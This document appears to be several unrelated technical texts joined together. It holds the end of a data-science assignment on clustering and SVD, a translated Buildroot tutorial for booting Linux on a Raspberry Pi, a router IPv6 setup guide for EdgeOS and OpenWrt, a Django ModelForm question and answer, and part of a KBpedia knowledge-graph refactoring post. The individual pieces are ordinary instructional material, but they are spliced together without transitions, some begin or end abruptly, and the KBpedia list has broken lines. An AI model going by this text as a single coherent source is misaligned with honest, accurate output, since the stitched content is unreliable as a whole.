Repeat with 6 clusters. Do you think this clustering does a better or worse job? Explain why, using evidence from the plots (and if you think additional analyses would be useful, include them to support your argument).
For each cluster in the clustering you think did a better job, find the words that are most important for that cluster. The KMeans object, after it has been fit, has a cluster_centers_ field containing a matrix. There is a row for each cluster, and the columns are features (in our case, words); it says where in word-space the middle of that cluster is. What words have the largest values for each cluster? You can get the words with the vectorizer's get_feature_names() method. You can get a row of the matrix with matrix[row, :], and use that with the feature names to make a series. Do these words make sense in light of the documents in that cluster?
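A minimal sketch of that lookup, assuming word_vec is your fitted vectorizer and km your fitted KMeans (both names are placeholders):
import pandas as pd

words = word_vec.get_feature_names()                          # columns of the matrix, in order
center = pd.Series(km.cluster_centers_[0, :], index=words)    # row 0 = first cluster's centroid
center.nlargest(10)                                           # the 10 most important words for that cluster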
Reflection (10%)
Write 2–3 paragraphs about what you learned from this assignment. Please be specific — I would like you to reflect on particular things you learned about text classification or clustering, or about this data, and not just say general things about learning about text. What surprised you in this project?
Extra Credit (5%)
Use GridSearchCV to simultaneously pick a good number of dimensions for the SVD and a good number of neighbors. You can do this by using it to search for parameters for a pipeline, as sketched below. Does optimizing your SVD improve the resulting classifier's accuracy?
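The mechanism looks roughly like this: pipeline parameters are addressed as step__parameter, so one grid can cover both the SVD size and the neighborhood size (svd_knn_pipe is the three-stage pipeline sketched earlier; the grid values are just examples):
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer, accuracy_score

param_grid = {
    'svd__n_components': [5, 10, 25, 50, 100],   # tunes the 'svd' step of the pipeline
    'knn__n_neighbors': [1, 2, 3, 5, 7, 10],     # tunes the 'knn' step of the pipeline
}
search = GridSearchCV(svd_knn_pipe, param_grid, scoring=make_scorer(accuracy_score))
search.fit(train['text'], train['category'])
search.best_params_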
NMF provides another strategy for matrix factorization. Apply it to count vectors (not TF-IDF vectors) as input to k-NN, and grid-search the resulting classifier's settings. How does it compare to using SVD for classifying articles?
Time Estimate
Data prep: 1 hour
Classification: 2 hours
Dimensionality reduction: 1 hour
Summarizing Accuracy: 30 minutes
Clustering: 2 hours
Reflection: 30 minutes
|
This article is a translation of ThirtyThreeForty's Mastering Embedded Linux, Part 3: Buildroot.
In this chapter we finally get hands-on. We will build Linux from source and try to boot it on a Raspberry Pi. As mentioned in earlier articles, this chapter is equal parts discussion and tutorial.
This chapter introduces Buildroot, a highly customizable tool for building embedded Linux images. Buildroot is powerful yet easy to pick up. It provides a set of automation scripts, so building an image no longer needs much manual intervention and you can do other work while it compiles.
In this article we will:
Download Buildroot and kick off a build with 6 commands
While it builds, discuss what Buildroot automates and briefly walk through the build flow
Finally, try booting the image we built on a Raspberry Pi
The process should be simple and fun1 — let's get started!
Prerequisites
At the end of the previous chapter we covered the hardware needed here. We will use a Raspberry Pi as the target and an FT2232 as the serial adapter for talking to it. If you don't want to buy any hardware, you can also try running the image in a virtual machine.
Whatever target hardware you use, you still need the following:
A workstation running Linux. If you don't know which distribution to choose, use Ubuntu. If you aren't running Linux, install a virtual machine instead. This article won't explain how to install Linux on your host or VM, so have that ready beforehand.
15 GB of free disk space. We are compiling an entire operating system; the final output is small, but the intermediate steps need quite a bit of space. If you are using a VM, make sure enough disk has been allocated to it.
2–4 hours of spare time, to read this article, build the system, and test the result.
Some Linux knowledge. Not much is needed, but knowing a few common shell commands helps.
Building Buildroot
Building Buildroot takes just 4 steps:
Install the host tools
Download Buildroot
Configure Buildroot
Start the build
These 4 steps need only 6 commands, described in detail below.
Installing the host tools
The first step is installing the tools Buildroot does not bring along itself, including:
Git: Buildroot also offers tarball downloads, but in the long run Git is the better choice
A compiler: Buildroot needs an initial compiler to build its own compiler
Assorted small utilities: Buildroot needs these to download and process source code; the full list is in the Buildroot documentation.
screen: a serial console tool for the FT2232
Install them with the command below. (Note: the ~$ at the start of every command is the shell's own prompt — don't copy it, only the command after it.)
~$ sudo apt install -y git build-essential wget cpio unzip rsync bc libncurses5-dev screen
These tools give Buildroot a minimal environment; Buildroot uses them to build its own tools and compile the system.
(The command above is for Ubuntu and is the only distro-specific command in this tutorial. Every other command interacts with Buildroot rather than with the host operating system.)
Downloading Buildroot
Buildroot offers many ways to download its source code, but the most convenient is Git.
Clone Buildroot with Git:
~$ git clone git://git.buildroot.net/buildroot
Cloning into 'buildroot'...
remote: Enumerating objects: 356009, done.
remote: Counting objects: 100% (356009/356009), done.
remote: Compressing objects: 100% (116215/116215), done.
remote: Total 356009 (delta 248969), reused 342974 (delta 238353)
Receiving objects: 100% (356009/356009), 75.76 MiB | 1.36 MiB/s, done.
Resolving deltas: 100% (248969/248969), done.
~$ cd buildroot/
We are now inside the Buildroot directory. We need to switch to a specific Buildroot release to build from. In this tutorial we will build the then-latest 2019.11.1 release. (Translator's note: the latest is now 2020.02.)
Check out the 2019.11.1 tag:
~/buildroot$ git checkout 2019.11.1
Note: checking out '2019.11.1'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b <new-branch-name>
HEAD is now at 57fbebac60 Update for 2019.11.1</new-branch-name>
Simple, right? Git is telling us that we are not currently on a branch ("detached HEAD"); we can ignore this message.
Configuring Buildroot
Now you need to pick a configuration that matches your hardware. The command differs slightly depending on your target:
Target  Command
Raspberry Pi Zero W  make raspberrypi0w_defconfig
Raspberry Pi Zero  make raspberrypi0_defconfig
Virtual machine  make qemu_x86_64_defconfig
The argument after make is a configuration file. You can see all of the configuration files in the configs directory; we will explain this in more detail later.
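For example, you can first list the Raspberry Pi configurations that ship with Buildroot (output abbreviated; the two names shown are the ones used in this tutorial):
~/buildroot$ ls configs/ | grep raspberrypi
raspberrypi0_defconfig
raspberrypi0w_defconfig
...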
~/buildroot$ make raspberrypi0w_defconfig
Buildroot prints every command it runs, so the output can look messy. Ignore all of it for now and only look at the last few lines. When the lines below appear, your configuration has taken effect.
#
# configuration written to /home/georgev/buildroot/.config
#
Building
Now we are ready to build the entire system. Buildroot does the rest of the work for us, but compiling takes a while — usually around 2–3 hours, depending on how fast your workstation and your network connection are.
Ready?
Let's build the image! Just run the command below2.
~/buildroot$ make
After you enter this command you will see a wall of text scroll past — that is Buildroot downloading and compiling the system. When the build finishes, Buildroot produces an SD card image for you to flash.
How Buildroot works
While it compiles, I'll walk you through how the various parts of Buildroot work.
Build flow diagram
Here is Buildroot's build flow3:
Buildroot builds the toolchain, including the cross-compiler and the tools used to build the system (green)
The source code of each piece of software (blue) is downloaded from the internet
Buildroot scripts (grey) unpack the sources, apply patches, configure, compile, and install them into the target output directory, forming the target's root filesystem (rootfs) (purple)
Additional files, such as device configuration files, are also copied into the target output directory
Finally, the scripts assemble the pieces into the root filesystem.
There are exceptions to the flow above, of course. Some cross-compilers are downloaded prebuilt instead of being compiled from source; sometimes the vendor's "Board Support Package (BSP)" has already compiled everything for you. Some steps in the diagram are then skipped, but the overall framework stays the same.
The following directories in the Buildroot tree are the important ones — you will spend most of your time dealing with them.
Directory  Purpose
board/  Files and scripts supporting the target devices
configs/  Predefined Buildroot build configurations, such as raspberrypi0w_defconfig
package/  Package definitions
output/host/  Build tools that run on the host
output/target/  Target output directory, used to stage the target binaries
output/images/  Directory for the final filesystem and firmware images
So the next question is: how does that one magic make command know how to build everything? To answer it, we first need to talk about the structure of Buildroot packages.
Buildroot packages
Almost everything in Buildroot is a package. In Buildroot, the build scripts are grouped into "packages".
Each package has its own configuration options, build steps, and dependencies. The dependencies determine the order in which packages are built, the build steps define the commands used to download and compile, and the configuration options control how the package is built.
Once you understand package configuration, the overall build configuration is easy to understand too.
Build configuration
Putting the configuration of all packages together gives the build configuration. Using a predefined build configuration (defconfig) is a convenient way to select all the relevant options at once.
So that is how make knows what to build: all of the options were provided by the raspberrypi0w_defconfig file we specified at the beginning6. (GNU Make computes the dependency tree and builds each package in the correct order.)
Selecting a defconfig copies all of its settings into the current configuration file (the .config file). The menuconfig tool provides a friendly interface for changing options, and you can use it freely to modify the current configuration.
Note that the .config file is not version-controlled by Git. Use make savedefconfig to copy the settings from the current configuration into a defconfig file, which is version-controlled.
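A minimal sketch of that round trip:
~/buildroot$ make menuconfig       # tweak options in the UI; the result is written to .config
~/buildroot$ make savedefconfig    # fold the changed options back into the defconfig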
Booting the new image
Enough talk — let's boot Linux.
Near the end of the build you will see log lines like these:
INFO: vfat(boot.vfat): adding file 'zImage' as 'zImage' ...
INFO: vfat(boot.vfat): cmd: MTOOLS_SKIP_CHECK=1 mcopy -bsp -i '/home/georgev/Code/buildroot-mel/output/images/boot.vfat' '/home/georgev/Code/buildroot-mel/output/images/zImage' '::' (stderr):
INFO: hdimage(sdcard.img): adding partition 'boot' (in MBR) from 'boot.vfat' ...
INFO: hdimage(sdcard.img): adding partition 'rootfs' (in MBR) from 'rootfs.ext4' ...
INFO: hdimage(sdcard.img): writing MBR
The log above tells us that the SD card image for the Raspberry Pi (sdcard.img) has been created. The image is built from the root filesystem in output/target/, whose layout you can inspect with ls7:
~/buildroot$ ls -lh output/target/
total 64K
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 22:01 bin
drwxr-xr-x 4 georgev georgev 4.0K Jan 13 20:48 dev
drwxr-xr-x 5 georgev georgev 4.0K Jan 13 22:01 etc
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 22:01 lib
lrwxrwxrwx 1 georgev georgev 3 Jan 13 21:08 lib32 -> lib
lrwxrwxrwx 1 georgev georgev 11 Jan 13 21:23 linuxrc -> bin/busybox
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 media
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 mnt
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 opt
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 proc
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 root
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 run
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 22:01 sbin
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 sys
-rw-r--r-- 1 georgev georgev 1.4K Jan 13 21:08 THIS_IS_NOT_YOUR_ROOT_FILESYSTEM
drwxr-xr-x 2 georgev georgev 4.0K Jan 13 20:48 tmp
drwxr-xr-x 6 georgev georgev 4.0K Jan 13 22:01 usr
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 20:48 var
We can also double-check that the image is in the output/images/ directory:
~/buildroot$ ls -lh output/images/
total 225M
-rw-r--r-- 1 georgev georgev 24K Jan 13 22:01 bcm2708-rpi-zero.dtb
-rw-r--r-- 1 georgev georgev 32M Jan 13 22:01 boot.vfat
-rw-r--r-- 1 georgev georgev 120M Jan 13 22:01 rootfs.ext2
lrwxrwxrwx 1 georgev georgev 11 Jan 13 22:01 rootfs.ext4 -> rootfs.ext2
drwxr-xr-x 3 georgev georgev 4.0K Jan 13 21:28 rpi-firmware
-rw-r--r-- 1 georgev georgev 153M Jan 13 22:01 sdcard.img
-rw-r--r-- 1 georgev georgev 4.8M Jan 13 22:01 zImage
Everything looks good. Now let's flash this image onto the Raspberry Pi's SD card and connect the Pi to the computer.
Optional step: booting the virtual machine
If you are using a Raspberry Pi, skip this section.
If you chose the virtual machine as your target, start it with this command8:
~/buildroot$ output/host/bin/qemu-system-x86_64 -M pc -kernel output/images/bzImage -drive file=output/images/rootfs.ext2,if=virtio,format=raw -append rootwait root=/dev/vda -net nic,model=virtio -net user
If the VM window appears, the boot succeeded. Skip the "Booting the firmware" section below — that part is for the Raspberry Pi.
Aside: how to use dmesg
dmesg is a small Linux utility that displays the kernel log. The kernel prints the names it assigns to newly attached devices, so it is very useful when debugging.
The basic usage is simple — just run:
$ dmesg -w
The -w option means "watch": after showing the existing log, it keeps monitoring for new kernel messages. You can ignore the existing log for now — it is long and not very useful. After running this command, plug in your SD card reader and you will see output like this:
[163513.147002] mmc0: new ultra high speed SDR50 SDHC card at address aaaa
[163513.174253] mmcblk0: mmc0:aaaa SP32G 29.7 GiB
[163513.189137] mmcblk0: p1
In this example the SD card was assigned a device named mmcblk0 containing a single partition p1. The full device path is therefore /dev/mmcblk0 and the partition path is /dev/mmcblk0p1. Depending on the type of card reader, the device name may be prefixed with "sd" instead.
When you no longer want to watch the log, press Ctrl+C to stop.
Flashing the SD card
Connect your SD card to the computer with a reader and use dmesg to find its name. The dd command copies the image onto the SD card. Replace /dev/mmcblkX in the command below with your SD card's real path.
~/buildroot$ sudo dd if=output/images/sdcard.img of=/dev/mmcblkX bs=1M status=progress
Warning:
Make sure your of (output file) is correct. If you mistakenly select your workstation's hard drive,
dd will wipe the data on that drive completely. If you are not sure, go back to the previous section and double-check the device path.
The command's parameters mean the following:
Parameter  Meaning
if=  Input File — the file data is read from
of=  Output File — the file data is written to
bs=  Block Size — how much data is written at a time
status=  Show a progress indicator (may not always work)
When the command finishes, run the following to make sure the kernel flushes all caches to the SD card:
~/buildroot$ sync
Once this command completes you can remove the SD card and insert it into the Raspberry Pi. Don't power the Pi on yet — we still have work to do. (Although nothing bad happens if you do.)
Connecting to the Raspberry Pi's serial debug port
We now need to connect the FT2232's UART to the Raspberry Pi's UART. Here is the Pi's pinout:
Because the FT2232 is more than just a UART adapter, we need to know exactly which pins it uses in UART mode. From the FT2232 datasheet:
For Async Serial, ADBUS0 is TXD and ADBUS1 is RXD.
Connect the Pi's UART TXD to the FT2232's UART RXD, and likewise the other way round. You end up with something like this:
Now connect the FT2232 to your workstation and use dmesg to find its device name. It will usually be ttyUSB0 or ttyUSB1 — the FT2232 has two channels9.
Opening the serial port
Run GNU Screen against the FT2232's device, set the baud rate, and disable flow control (most Linux serial consoles use 115200 baud with no hardware flow control).
~/buildroot$ sudo screen -fn /dev/ttyUSBX 115200
To quit Screen, press Ctrl+a and then \.
Booting the firmware
Power on the Raspberry Pi; the serial console should start printing boot messages:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.19.66 ([email protected]) (gcc version 8.3.0 (Buildroot 2019.11.1)) #1 Tue Jan 14 11:14:59 CST 2020
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7), cr=00c5387d
[ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
[ 0.000000] OF: fdt: Machine model: Raspberry Pi Zero Rev 1.3
[ 0.000000] Memory policy: Data cache writeback
[ 0.000000] cma: Reserved 8 MiB at 0x19000000
[ 0.000000] random: get_random_bytes called from start_kernel+0x90/0x4a4 with crng_init=0
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 104545
[ 0.000000] Kernel command line: coherent_pool=1M bcm2708_fb.fbwidth=720 bcm2708_fb.fbheight=480 bcm2708_fb.fbswap=1 smsc95xx.macaddr=B8:27:EB:6C:5F:E1 vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000 root=/dev/mmcblk0p2 rootwait console=tty1 console=ttyAMA0,115200
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 397928K/421888K available (6947K kernel code, 635K rwdata, 2080K rodata, 452K init, 796K bss, 15768K reserved, 8192K cma-reserved)
Eventually it prints the login prompt:
Welcome to Buildroot!
buildroot login:
Log in with root as the username — this account has no password. Once logged in, try ls /usr/bin to see which programs you can run.
If you made it this far, congratulations! You have successfully turned source code into a bootable image.
Summary
This was a top-level tour of Buildroot; there is plenty in Buildroot that this tutorial did not touch. Even so, it packs in a lot of information.
In this tutorial:
You obtained all of the code that runs on the target device, along with the toolchain that builds it.
Every piece of software in the process is open source, and you compiled it with make. If something breaks one day, or you no longer want it, you can simply change it.
All of the work is automated.
Buildroot lets you focus on one thing at a time. You can take an existing defconfig and layer your own changes on top of it.
The output root filesystem is very small.
The default output image is only 57 MB, most of which is kernel modules that can be switched off. Buildroot's "small image" philosophy lets you fit more functionality into limited space — you can even build an image as small as 4 MB!
Further reading
The following books are closely related to this chapter:
How Linux Works, 2nd edition10, covers a great many Linux topics. It is relevant to desktop, server, and embedded Linux alike, from the basic command line all the way to advanced systems such as X11 and DBus. If you want to know how these things really work, this book can help.
Bootlin's Buildroot training course, offered by the non-profit embedded Linux organization Bootlin. You can pay to attend, or simply use their training materials.
The Buildroot user manual provides much more information on using Buildroot. It explains parts of the build system in detail and shows how to write a new package. Being a manual rather than a tutorial, it can feel long-winded; it is worth reading carefully before you dive deep into Buildroot.
Next up…
In the next chapter we will add some new features to the system we just built. That will involve reading some documentation and customizing the configuration with the menuconfig command demonstrated earlier.
We will change the configuration, rebuild, and test the changes (a rebuild takes only a few minutes in Buildroot). This is the loop you will use most often when making firmware.
Notes
If you run into problems:
Try googling your error message with "Buildroot" added. Someone has usually hit a similar problem before, and you can adapt their solution. Embedded systems are like that — full of annoying problems — and patience plus good debugging skills are the key to solving them.
About virtual machines:
If you are running Buildroot inside a VM, make sure the FT2232 and the SD card are passed through to the VM. Also, don't give the VM too few resources, or the build will take a very long time.
What counts as fun varies from person to person. ↩︎
If your workstation needs to run other things at the same time, use nice make so that make runs at a lower priority. ↩︎
Although it says Buildroot, this flow applies to every embedded Linux distribution. ↩︎
The configuration file for packages built for the host is Config.host.in ↩︎
Kconfig was originally designed by the Linux kernel developers to manage the kernel's extensive configuration options. Buildroot uses a similar structure, so it can use Kconfig as well. ↩︎
Strictly speaking this is not accurate: only the non-default options are actually stored in the defconfig. But since the defaults are stored elsewhere, we can think of all the options as living in the defconfig. ↩︎
Buildroot puts a THIS_IS_NOT_YOUR_ROOT_FILESYSTEM file in output/target to tell you that this is not the root filesystem. It is, really — it is just a few steps short of the real root filesystem (such as creating certain special files). ↩︎
Wondering where this strange command comes from? Take a look at boards/qemu/x86_64/readme.txt. ↩︎
If you are using an FT232 (not a 2232), there is only one USB channel. We will not use the second channel for now. ↩︎
This is an affiliate link, which helps me build better embedded systems (translator's note: it is the original author's link). ↩︎
|
Many residential networks in China now support IPv6 and hand out DHCPv6-PD, so with a Ubiquiti (UBNT) router you can enable it in a very simple way and let the devices at home connect.
Enter the Config Tree
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd
add:0
Update
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0
prefix-length :/60
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0 / interface
interface switch0
Update the list
interfaces / ethernet / eth0 / pppoe / 0 / dhcpv6-pd / pd / 0 / interface / switch0
host-address ::1
prefix-id :1
service dhcpv6-stateless
interfaces / ethernet / eth0 / pppoe / 0 / ipv6 / address — click +
interfaces / ethernet / eth0 / pppoe / 0 / ipv6 / enable — click +
Once the settings above are done, click Preview to apply them. In actual use I also found that the IPv6 DNS servers handed out by my ISP (China Mobile) often misbehave, which makes web pages very slow to start loading; enabling the no-dns option under IPv6 fixes this.
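For reference, the same settings can also be entered from the EdgeOS CLI instead of the Config Tree. This is only a sketch based on the node paths shown above, assuming the usual configure/set/commit workflow — double-check the exact node names on your firmware version:
configure
set interfaces ethernet eth0 pppoe 0 dhcpv6-pd pd 0 prefix-length /60
set interfaces ethernet eth0 pppoe 0 dhcpv6-pd pd 0 interface switch0 host-address ::1
set interfaces ethernet eth0 pppoe 0 dhcpv6-pd pd 0 interface switch0 prefix-id :1
set interfaces ethernet eth0 pppoe 0 dhcpv6-pd pd 0 interface switch0 service dhcpv6-stateless
set interfaces ethernet eth0 pppoe 0 ipv6 enable
commit
save
exit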
If your ISP only gives you a /64 and no DHCPv6-PD, you can solve it with IPv6 NDP proxying instead. I have done this before on OpenWrt; here the WAN interface is eth0 and the LAN bridge is br-lan. First install ndppd:
opkg update && opkg install ndppd
Check my global IPv6 address:
root@OpenWrt:/etc# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 8C:21:0A:A6:94:B3
inet addr:121.48.171.138 Bcast:121.48.171.255 Mask:255.255.255.128
inet6 addr: 2001:250:2000:7520:8e21:aff:fea6:94b3/64 Scope:Global
inet6 addr: fe80::8e21:aff:fea6:94b3/64 Scope:Link
UP BROADCAST RUNNING ALLMULTI MULTICAST MTU:1500 Metric:1
RX packets:517397 errors:0 dropped:450 overruns:0 frame:0
TX packets:777032 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:177017984 (168.8 MiB) TX bytes:688621714 (656.7 MiB)
Interrupt:4
It is 2001:250:2000:7520:8e21:aff:fea6:94b3/64. Because the prefix is a /64, we cannot carve out further subnets, so we use the Neighbor Discovery proxying mentioned above.
Then give the LAN interface br-lan an IPv6 address whose first 64 bits match eth0's and whose last 64 bits differ; when setting it, the prefix length must be longer than 64:
ip -6 addr add 2001:250:2000:7520:1::1/80 dev br-lan
Edit /etc/ndppd.conf:
proxy eth0{
router yes
timeout 500
ttl 30000
rule 2001:250:2000:7520:1::/80 {
auto
}
}
Then start ndppd with /etc/init.d/ndppd start, and the proxying is configured. At this point, however, clients still cannot obtain addresses automatically — radvd can only advertise /64 prefixes — so we also need a DHCPv6 server:
opkg install radvd
opkg install wide-dhcpv6-server
Configure /etc/config/radvd:
config interface
option interface 'lan'
option AdvSendAdvert 1
option AdvManagedFlag 1
option AdvOtherConfigFlag 1
list client ''
config prefix
option interface 'lan'
# If not specified, a non-link-local prefix of the interface is used
list prefix ''
option AdvOnLink 1
option AdvAutonomous 1
option AdvRouterAddr 0
Configure /etc/config/dhcp6s, setting enabled to 1.
Configure /etc/dhcp6s.conf:
interface br-lan {
address-pool pool1 86400;
};
pool pool1 {
range 2001:250:2000:7520:1::200 to 2001:250:2000:7520:1::300 ;
};
Start radvd and the DHCPv6 server:
/etc/init.d/radvd start
/etc/init.d/dhcp6s start
Mind the order; if you run into errors, you can:
/etc/init.d/radvd restart
/etc/init.d/ndppd restart
With that, NDP proxying and IPv6 address assignment are configured. Clients connected to the router now obtain both IPv4 and IPv6 addresses automatically and can reach both the IPv4 and IPv6 internet without problems:
Pinging Google over IPv6 locally:
MartiandeMacBook-Pro:~ MartianZ$ ping6 ipv6.google.com
PING6(56=40+8+8 bytes) 2001:250:2000:7520:1::100 --> 2404:6800:4008:c01::68
16 bytes from 2404:6800:4008:c01::68, icmp_seq=0 hlim=46 time=110.295 ms
16 bytes from 2404:6800:4008:c01::68, icmp_seq=1 hlim=46 time=113.267 ms
16 bytes from 2404:6800:4008:c01::68, icmp_seq=3 hlim=46 time=109.890 ms
^C
--- ipv6.l.google.com ping6 statistics ---
4 packets transmitted, 3 packets received, 25.0% packet loss
round-trip min/avg/max/std-dev = 109.890/111.151/113.267/1.506 ms
|
Question:
class SomeModel(models.Model):
    text = models.TextField()
    ip = models.IPAddressField()
    created_on = models.DateTimeField()
    updated_on = models.DateTimeField()
Say I have that as a model. What if I wanted to display only the 'text' field widget for the user to submit data? I obviously wouldn't want the user to see (or be able to change) the widgets for ip, created_on, and updated_on. Yes, I know I can add them as hidden fields on the form, but that's not what I'm looking for.
I'm wondering how I can avoid rendering those fields at all when rendering my form, and just populate them dynamically when the form is posted so it still passes validation — essentially overriding the blank values of ip, created_on, and updated_on while the form is being cleaned/validated. I know how to do this in the view by using request.POST.copy() and injecting my values, but I'd like to know if it's possible in the models or forms.
Solution 1:
A few things:
First ModelForms:
class SomeModelForm(ModelForm):
    class Meta:
        model = SomeModel
        exclude = ['ip', 'created_on', 'updated_on']
Second, the model field options:
class SomeModel(models.Model):
    text = models.TextField()
    ip = models.IPAddressField()
    created_on = models.DateTimeField(auto_now_add=True)
    updated_on = models.DateTimeField(auto_now=True)
Third:
For ip, I think you should do that in your view.
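For example, a sketch of how that could look in the view (the view name is made up; form.save(commit=False) lets you fill in the excluded field before hitting the database):
def submit_text(request):                             # hypothetical view name
    form = SomeModelForm(request.POST)
    if form.is_valid():
        obj = form.save(commit=False)                 # build the instance without saving yet
        obj.ip = request.META.get('REMOTE_ADDR')      # fill in the excluded field server-side
        obj.save()                                    # created_on/updated_on come from auto_now*
    # then redirect or re-render the form as usual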
|
Bringing Home the Lessons to Date with KBpedia v 3.00
Today’s installment in our Cooking with Python and KBpedia series is a doozy. Not only are we wrapping up perhaps the most important part of our series — building KBpedia from scratch — but we are also applying the full roundtrip software in our cowpoke Python package to a major re-factoring of KBpedia itself. This re-factoring will lead to the next release of KBpedia v. 3.00.
This re-factoring and new release was NOT part of the original plan for this
CWPK series. Today's efforts were the result of issues we have discovered in the current version 2.50 of KBpedia, the version with which we began this series. The very process we have gone through in developing the cowpoke software to date has surfaced these problems. The problems have been there and perhaps part of KBpedia for some time, but our prior build routines were such that these issues were not apparent. By virtue of different steps and different purposes, we have now seen these things, and now have the extract and build procedures to address them.
It turns out the seven or so problems so identified provide a ‘perfect‘ (in the sense of ‘storm‘) case study for why a roundtrip capability makes sense and how it may be applied. Without further ado, let’s begin.
Summary of the Problem Issues
The cowpoke Python package as we have used to date has surfaced seven types of issues with KBpedia, v. 250, the basis with which we started this CWPK series. Our starting build files for this series are ones extracted from the current public v 250 version. About half of the issues are in the KBpedia knowledge graph, but had remained hidden given the nuances of our prior Clojure build routines. The other half of the issues relate to our new use of Python and owlready2.
These seven issues, with some background explanation, are:
Remove hyphens – in our prior build routines with Clojure, that language has a style that favors dashes (or hyphens) when conjoining words in a label identifier. Python is not hyphen-friendly. While we have not seen issues when working directly with the owlready2 package, there are some Python functions that burp with hyphenated KBpedia identifiers:
print(rc.Chemistry-Topic)
---------------------------------------------------------------------------
NameError Traceback (most recent call last)
<ipython-input-1-5566a42d12b4> in <module>
----> 1 print(rc.Chemistry-Topic)
NameError: name 'rc' is not defined
We therefore replace hyphens with underscores throughout cowpoke and its knowledge graphs.
Ensure the
kko.superClassOf property is moved to an AnnotationProperty. When we want to use the concept of superclass as an object property, we can now use the built-in owlready2 superclass.
Remove OpenCyc href’s – part of KBpedia’s heritage comes from the open-source version of the Cyc ontology, including many initial concept definitions. OCyc distribution and support was ceased in 2017, though the ontology is still referenceable online. Given the receding usefulness of OCyc, we want to remove all of the internal URI references in definitions within KBpedia.
Remove duplicates – one nice aspect of the owlready2 engine is its identification of circular references, while gracefully proceeding with only a warning. Our new build routines have surfaced about ten of these circularities in KBpedia v 250. Two of these, Person←→HomoSapiens and God←→Deity, are intended design decisions by us as editors of KBpedia. The other instances, however, are unintended, and ones we want to resolve. We need to remove these.
Remove the SuperType concept and move it to an annotation property – besides being one of the duplicates (see (4) above), our adoption of Charles Sanders Peirce's universal categories in the KBpedia Knowledge Ontology (KKO) has supplanted the 'SuperType' nomenclature with Generals.
Correct domain and range assignments – our internal specifications had nearly complete domain and range assignments for version 2.50, but apparently during processing they were not properly loaded. The fact they were not completely assigned in the public release was missed, and needs to be corrected.
Remove trailing spaces in the prefLabels for properties – the preferred labels for virtually all of the properties in version 250 had trailing spaces, which were never apparent in listings or user interfaces, but did become evident once the labels were parsed for roundtripping.
The latter four problems ((4), (5), (6), and (7)) were present prior to cowpoke, having been issues in KBpedia v 250 at the time of release. Processing steps and other differences in how the builds are handled in Python made these issues much more evident.
The Plan of Attack
Some of these issues make sense to address prior to others. In looking across these needed changes, here is what emerged as the logical plan of attack:
A. Make KKO changes first ((2), (4), and (5))
Since the build process always involves a pre-built KKO knowledge graph, it is the logical first focus if any changes involve it. Three of the seven issues do so, and efforts cannot proceed until these are changed. With respect to (5), we will retain the idea of 'SuperType' as the root node of a typology, and designate the 80 or so KKO concepts that operate as such with an annotation property. To prevent confusion with Generals, we will also remove the SuperType concept.
B. Make bulk, flat-file changes ((1), (3), (6), (7))
This step in the plan confirms why it is important to have a design with roundtripping and the ability to make bulk changes to input files via spreadsheets. Mass changes involving many hundreds or thousands of records are not feasible with a manually edited knowledge graph. (I know, not necessarily common, but it does arise as this case shows.) It also makes it hard, if not close to impossible, to make substantial modifications or additions to an existing knowledge graph in order to tailor it for your own domain purposes, the reason why we began this CWPK series in the first place. Addressing the four (1), (3), (6), and (7) problem areas will take the longest share of time to create the new version.
One of these options (3) will require us to develop a new, separate routine (see below).
C. Propagate changes to other input files ((1), (2), (4))
With regard to replacing hyphens with underscores (1), this problem occurs not only where a property or class is declared, but in all subsequent references to it. Making a global search-and-replace of underscores for hyphens means all build files must be checked and processed. Any time changes are made to key input files (i.e., the ones of the struct variety), it is important to check the other relevant input files for consistency. We also need to maintain a mapping between the two ID forms so that older URIs continue to point to the correct resources.
D. Re-build
Once all input files are modified and checked, we are ready to start the re-build.
General Processing Notes
The basic build process we are following is what was listed in the last installment, CWPK #47, applied in relation to our plan of attack.
I am recording notable observations from the pursuit of these steps. I am also logging time to provide a sense of overall set-up and processing times. There are, however, three areas that warrant separate discussion after this overall section.
As I progress through various steps, I tend to do two things. First, after a major step in the runs I bring up the interim build of KBpedia in Protégé and check to see if the assignments are being made properly. Depending on the nature of the step at-hand, I will look at different things. Second, especially in the early iterations of a build, I may backup my target ontology. Either I do this by stipulating a different output file in the routine, or create a physical file backup directly. Either way, I do this at these early phases to prevent having to go back to Square One with a particular build if the new build step proves a failure. With annotations, for example, revisions are added to what is already in the knowledge graph, as opposed to replacing the existing entries. This may not be the outcome you want.
The changes needed to KKO (A) above are straightforward to implement. We bring KKO into Protégé and make the changes. Only when the KKO baseline meets our requirements do we begin the formal build process.
The hyphen changes (1) were rather simple to do, but affected much in the four input files (two structural, two annotations for classes and properties). Though some identifiers had more than one hyphen, there were more than 7 K replacements for classes, and more than 13 K replacements for properties, for a total exceeding 20 K replacements across all build files (this amount will go up as we subsequently bring in the mappings to external sources as well; see next installment). I began with the structure files, since they have fewer fields and there were some open tasks on processing specific annotations.
